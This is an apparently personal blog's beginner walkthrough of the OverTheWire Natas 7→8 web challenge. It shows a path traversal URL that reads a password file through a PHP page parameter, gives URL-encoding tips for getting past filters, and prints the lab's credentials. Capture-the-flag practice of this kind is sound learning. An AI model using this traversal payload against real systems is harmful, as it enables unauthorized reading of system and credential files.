About Me
Avatar
Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Natas Level 6 → 7 tutorial!!

overthewire natas walkthrough ctf web beginner
Published on 19 Dec 2023

Login

URL: http://natas7.natas.labs.overthewire.org

Credentials: natas7:bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

homepage

Task

The site shows two links (“Home”, “About”). The URL includes a parameter:

index.php?page=home

Find a way to read the file that stores the password for natas8.

A little bit of Theory

  • Many PHP sites use include/require with a user-controlled filename (e.g., ?page=home).
  • If no sanitization is done, you can perform path traversal using ../ to climb directories and read files outside the web root.
  • On Natas, the next level’s password is usually under:
/etc/natas_webpass/<username>

Further reading:

Solution

  1. Inspect the page parameter

    Current URL pattern:

    http://natas7.natas.labs.overthewire.org/index.php?page=home

  2. Traverse to the password file

    Replace the value of page with a traversal path to the natas8 password:

    http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../../../../../etc/natas_webpass/natas8

  3. Read the output

    The response prints the contents of that file — the password for natas8.

success

Password

xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

Troubleshooting

  • Shows the normal page again? → Ensure you kept index.php?page=... and used enough ../ segments.
  • URL-encoding issues? → Try %2e%2e%2f instead of ../ if the app blocks the raw dots/slashes.
  • 403/404? → Double-check the exact target path: /etc/natas_webpass/natas8.

Nice job 🎉 You spotted an include-by-parameter pattern and used path traversal to exfiltrate the next level’s password!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨

Cinema

related posts

all tags

GOT-overwrite aboutme aead ai alphanumeric-shellcode apt argc0 argon2 aslr assembly asymmetric atoi automation backbox bandit base64 bash beginner behemoth binary binary-exploitation binary-to-ascii blackarch blind blind-sqli blogging blue-team bruteforce buffer-overflow buffer-overwrite c caesar canary capabilities checksec command-injection commonmark cookie cron crypto cryptography ctf cutter cyberchef cybersecurity defenders detection dev directory-traversal dnf docs drifter ecc education elf env envp exploitation finale forensics format-string formulaone frequency frequency-analysis gcc gdb getchar gfm ghidra github-pages governance gpg guide hashing hkdf http jekyll jmpbuf kali kasiski kdf kernel keylength kramdown krypton lab ld_preload leviathan lfi lfsr linux linux-syscall llmops log-poisoning ltrace manpage markdown maze memcpy mitigations mitmproxy mlops narnia natas networking newline-injection nonce nop-sled nx object-injection obsidian openssl osint overflow overthewire package-manager pacman parrot path path-hijacking pathname php pie pkc pki pointer-trick pqc priv-esc privilege-escalation provable-security pwn pwntools pyshark python race-condition radare2 rag randomness recon red-team redirect relro requests ret2env ret2libc reverse-engineering reversing ricing roadmap rop rot13 rsa scapy security seed seo serialization session setjmp-longjmp setuid shell shellcode smoke soc sockets sprintf sql-injection srop stack-canary stack-overflow strace strcmp strcpy streamcipher strings strncpy strtoul substitution suid suisei symlink symmetric terminal test threat-intel time-based tls troubleshooting tshark type-juggling ubuntu udp utumno vigenere virtualbox virtualization vmware vortex walkthrough web windows wireshark writing wsl x86
dash theme for Jekyll by bitbrain made with